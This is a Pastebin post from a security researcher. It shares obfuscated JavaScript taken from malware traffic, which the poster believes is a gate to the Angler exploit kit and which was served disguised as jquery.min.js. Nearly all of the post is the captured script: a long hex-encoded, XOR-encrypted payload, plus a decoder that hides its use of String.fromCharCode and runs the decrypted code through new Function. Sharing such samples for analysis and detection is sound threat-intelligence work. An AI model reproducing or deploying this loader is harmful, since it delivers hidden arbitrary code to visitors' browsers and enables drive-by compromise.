Neonprimetime

Exploit Kit Javascript from Malware Traffic analysis

Jun 3rd, 2016
257
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Exploit Kit Javascript from Malware Traffic analysis
  2. http://www.malware-traffic-analysis.net/2016/06/02/index.html
  3. 212.231.130.9 port 80 - positivessl.online - GET /script/jquery.min.js - possible gate to Angler EK (I think)
  4.  
  5. *****
  6.  
  7.  
  8. function rKFlmZpAv(Mjk2MjkxMDI1MQ) {
  9.     if (Mjk2MjkxMDI1MQ == null) {
  10.         return '';
  11.     }
  12.     var MTEzMzMzNTAxOQ = "2b\x32123523b3\x642a5a6f0\x392b70793a7a3f7e7c350d3f7a\x3386c684e1\x6510273\x367b0c680830047f72241\x326650\x3112\x31\x37d01\x37\x3965621\x666818\x3340\x35\x37d407b736616132175\x304797d\x366\x31e6a2b\x338647d0778736e13133171057b466a7f6a6d3a6\x3475037b636a1\x3211027d647b57687\x6662683a7471027f507\x36072a5b2d617813133171057b43\x36\x617f6a6d3a6\x34750229636a1211027d\x3647b\x3026\x387f62683a747102\x37850667311\x3447f647350686f66\x36938477d6278166\x347319417f7477506a5c6a08380\x317f637113741\x37265f\x32f40702\x33\x3245f2b\x33b320f1c232b57754a293b2e4422312b407417265f2f4e700\x372a\x35b2d631e\x367282e\x32300104c1e\x3332753727319417f74760\x366a5c6a08380\x317f63771364631\x64407d4\x377b6\x376a0a091d08463c79666938477d6274166\x347319417f7477\x3036\x615\x636a0\x3838017f6377136\x34631d4\x307d477\x62656a1a680830047f72251\x32665011217d017961620f\x31d2\x36067\x300a0404696a6d3a6475027c636a1211027d64\x37a02687f62683a7471027e5\x30\x36673114\x34\x37f\x3647000686\x66666938477d62781664\x37319417f74760d6a5c\x36a\x308380\x317f6371137432035\x63\x3031f1f1770161\x332175047973661e6a2b38647d077a736e131\x333171057a436a7f6\x616d3a6\x3475\x3007a6\x336a1211027d647b5\x32687f62683a74\x371037850\x3667\x3311\x3447f647350686f6669384\x377d62781664731\x39417f7477506a5c6a0838017f63711364631d407d477a676a1\x61680830047f707312665011217d017\x386d\x362\x31f681834057d4\x32\x379736\x36161321750\x3479\x375661e6a2b38647d0778736e\x3131331710579126a7f6a6d3a6475027e636a121\x31027d6\x347b55687f\x36\x32\x3683a747103785\x307\x36033b670d001\x37096\x381834057d4\x31\x37f736616132175\x3047922661e6a2b38647d077b7\x33\x36e1313\x331\x371\x3057a4e6a6f0070376962683a7471027a50\x3667311447f64730d686f6\x366938477d6279\x31664731\x39417f7476016a5c6a0838" + "\x30\x317f62\x37d137423\x3144\x31264a6\x610838017f627\x641364631d407d477b616a1\x61680830047f727812\x3665\x30\x311217d017963621f681834\x3057\x644\x31757366161321\x375\x3047870660\x650f2\x32002c7016\x31321750\x347975661e6\x612b\x3386\x347d067f736e1313\x3317105\x37a\x3476a7f6a6d3a6475027\x61636\x611211027\x64647b\x354687f62683a747103\x379506\x3673\x311447f64\x37107686\x66666938477d6\x327516647319417f74770c6a\x35c6a\x30838017f6226136\x34631d40\x37\x64477\x62606a0a1f2e2852150\x337c1211027d647\x6202687f6268\x33a7471027f50667311447f64\x3730\x31686f\x3666938477d627c166\x34\x37319417f747601\x36\x615c6\x6108\x338\x3017\x66\x36270136\x34631d407d4779616a1a680\x383004\x37f7\x322212665011217d01796162\x31f681834057d41\x32973661\x36\x313217504\x379\x371661e6\x61\x32b38647d0\x372a73\x36e1\x331331710\x357a43\x36a6f1e5625367509681\x3834057d\x3407e736616\x31321\x3750\x347870661e6a\x32b38\x364\x37d06767\x33\x36e1313317105\x37b146a7\x666\x616d3a6475027a\x3637a662a\x31d2f657\x30\x31613\x32175047c\x375661e\x36\x612b38\x36\x347d0\x327c73\x37e67282\x652307\x370242a3\x652f0074072\x325e2d777c1211027d\x3647a01687f62683\x6174710\x332b5\x30667311447f64720\x37686f6669\x33847\x37d627416647319417f7476016a5c6a0838017f6\x327c136\x34631d\x34\x307d47\x37\x62326\x611a6\x380830047f7224126650112\x317d0\x317c35621f681834057d\x3417c736616\x3132\x31750479\x376661e6a2b38647d067c736\x65131331710\x357b116\x617f6a6d3a6475022c636a1\x3211027d647\x610\x34687f62\x3683a747102\x379506\x367311447f6\x347301686f66693\x38477d672f16647\x3319417f7477566a5c6a08\x338017f6270136463\x31d40\x37d477b6\x326a1a6808300\x347f737512665011217d\x3017c35621f68183405\x37d45297366\x31\x36132175047c75661e6\x612b38\x3647d02797\x336e1\x3313317\x31057e426a7\x666a6d3\x6164750777636a\x31211027d64\x37a\x30168\x37f62683a74710\x327550\x3667311\x3447f6\x3476566\x386f666938477d637916\x36473" + "1\x39417\x667477\x3536a\x35c6\x610838017f6\x33751364631d407\x64477e\x3356a1a680830047f7625\x31\x32\x366\x35011217d01\x37c65621\x6668\x31834057d\x3447b736616132\x31\x375047c72661e6a\x32b3\x3864\x37d027773\x36e13133171\x3057a476a7f6\x616d3\x6164750377637a\x3662a1\x64\x32f\x36070\x362283e2\x370\x64\x314143b582\x622d0a09657706193747667f12522715790f00703\x370978672\x382e2\x330776242a3e2\x6605\x31\x343\x33\x310\x34024197c662a1d2f6\x367662283e27001417265f2f471\x300f1f5308\x31102470619\x37c662a1d2f67\x37662283e2\x3700141\x37265f2\x662a707311447f6473\x30c6\x386f66\x369384\x377d637916647319417f747\x36016a5c6a0838017f63751364631d407d477e356a1a680830047f76271266501121\x37d0\x317d32621f68183405\x37d407e7366161321\x37504\x37870661e6\x612b38647\x64067d736e13133171057b\x3466a7f6a6d3a64750\x327c636a1211\x30\x327d647b09687f626\x383a7\x347\x3102785066\x37311447f647\x33066\x386f6\x36\x36938\x3477d627816647319417f747701\x36a5c\x36a\x3083\x38017f627\x34\x3136\x34631d407d477b666a1a680830047f7273126\x365011217d017937621f6818\x334057d417473\x3661\x3613217\x3504792166\x31e6a2b38647d0778736e13133171\x3057f126a7f6a6d3a\x36475037\x62636a1211027d647b096\x387f62\x3683a7471032b506673114\x347f647\x33\x350686\x66666938477d637d16\x3647319417f7\x3476066a5\x636a0838017\x6662231364631d407d477b316a1a68\x30830047\x6673721\x3266\x350\x311217d01\x37d3\x30621f681834057d412b736\x3616132175047921661\x656a2\x623\x386\x347d072c736e13133171057b\x34e6a7f6a6d3a6\x34\x375022a636a1211027d647b04\x368\x37f62683a7471\x307285066\x37311447\x66647307\x3686f666938477d622b1664731\x39417f7473506a\x35c6a08\x338017f6370136\x34631d407d\x3477b366\x611a680830047f762712665\x3011217d0\x317a6d621f681834057d407\x357366161321\x37\x35047\x3871661e6a2\x6238647d0\x34\x32e736e\x31313317105784e6\x617f6a6d3a6475017d" + "636\x61\x31211027d647f576\x387\x666268\x33\x617471027f506673\x31\x31447f\x3647000\x3686\x66666938477d622f166\x347319\x3417f7475506a5c6a0838017\x6662201\x3364\x36\x331d407\x644779376a1a680830\x304\x37f71\x37412665011217d017d32\x3621f6818\x334057\x64417b73661\x3613217504\x37b22661e6a2\x6238647d\x30777736e1313317105784f6a7f6a6d3a64750\x31776\x336a1211027d647b50687f62683a7\x3471\x3027d50667311447f647301686\x66\x366693\x384\x377d617416\x3647319417f7473536\x61\x35c6a0\x38\x338017f\x367751364\x3631d407d477e\x3646a1a68083\x30047f\x37776\x31\x32665011217d017c61621f6818340\x357d4\x347a7\x3366161\x332\x317\x35047d22661e6a2b386\x347d067c736e\x31313\x33171057b43\x36a7f\x36a\x36d3\x616475022b636a12110\x327\x64\x3647b\x355687f6\x32683a7471007950667311447f647205686f666938477\x64627\x66166473\x319417f7476026a5c6a0838017f62711364631d40\x37d4\x377a\x36c6a1a6808300\x347f7625126\x365011217d017c64621\x66681834057d\x344747\x336616132175047c7666\x31e6a2b38647d0279736e1\x33133171057e456a7f6a6d3a647507\x37f\x3636a1211027d64\x37f55687f62683a7471022c50667311447f647356686f666938477d627f16\x3647319417f\x37477026a\x35\x636a083\x38017f6\x33771364\x3631d407\x64477a636\x611a680830047f727912665011217d\x301796d621f681834\x3057d4\x35287366161\x332175047925661\x656a\x32b38647d067f736\x65131\x33317\x31057b406a\x36f1e5625367c6f3906287b25250e09656\x36390207601d6d1a0\x35102c0\x66010049\x36473626967\x31\x37265f2f436429403b29212\x6257\x33b2d2e5b6d\x31b\x32\x391\x611f5\x360\x6217231c663f3\x37543f570b1d\x300\x3433c6478472a30155c20122221390a39\x3353714090d0c473e467\x303\x302\x32523a39205a3b6a23\x35a290e762628453a262b\x31\x636e020\x38783f04\x37c6\x620b7802263604672\x38257b1f100917\x32b1d7e64\x36c0e0\x322e0401000d\x32667004b162e0b43676d680e307a4738297\x661\x64330177296\x63680e";
  13.  
  14.     function vrDCFrjI(mGzITAbcX, LQwkqFyv) {
  15.         var mkpCBAWTom = '';
  16.         var bXtcnEFMIs = String;
  17.         var SNrWHpBf = unescape("%66") + '\u0072' + '\u006f' + unescape("%6d") + unescape("%43") + '\u0068' + unescape("%61") + unescape("%72") + '\u0043' + unescape("%6f") + unescape("%64") + unescape("%65");
  18.         var sIzjTXsw = bXtcnEFMIs[SNrWHpBf];
  19.         var finHGSvVZ = unescape("%32") * 1;
  20.         var jwtQyMVaN = '\u0031' + '\u0036';
  21.         for (var i = 0; i < mGzITAbcX.length; i += finHGSvVZ) {
  22.             mkpCBAWTom += sIzjTXsw(parseInt(mGzITAbcX.substr(i, finHGSvVZ), jwtQyMVaN * 1));
  23.         }
  24.         var lplipQBCyJ = '';
  25.         for (i = 0; i < mkpCBAWTom.length; i++) {
  26.             if (i > LQwkqFyv.length) VHTtsuGZF = i % (LQwkqFyv.length);
  27.             else VHTtsuGZF = i;
  28.             ktTatISm = sIzjTXsw(mkpCBAWTom.charCodeAt(i) ^ LQwkqFyv.charCodeAt(VHTtsuGZF));
  29.             lplipQBCyJ += ktTatISm;
  30.         }
  31.         return lplipQBCyJ;
  32.     }
  33.     NLxwWpg = new Function(vrDCFrjI(MTEzMzMzNTAxOQ, Mjk2MjkxMDI1MQ));
  34.     NLxwWpg();
  35. }
  36. rKFlmZpAv(Mjk2MjkxMDI1MQ);
  37.  
  38. *******
  39. *******
  40. *******
  41. More FROM @neonprimetime security
  42.  
  43. http://pastebin.com/u/Neonprimetime
  44. https://www.virustotal.com/en/USER/neonprimetime/
  45. https://twitter.com/neonprimetime
  46. https://www.reddit.com/USER/neonprimetime
Add Comment
Please, Sign In to add comment